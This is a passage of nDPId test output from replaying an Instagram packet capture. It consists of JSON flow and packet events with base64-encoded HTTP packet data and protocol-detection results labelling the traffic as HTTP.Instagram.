vIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"} +02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"} +02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="} +02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="} +00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"} +02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="} +00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 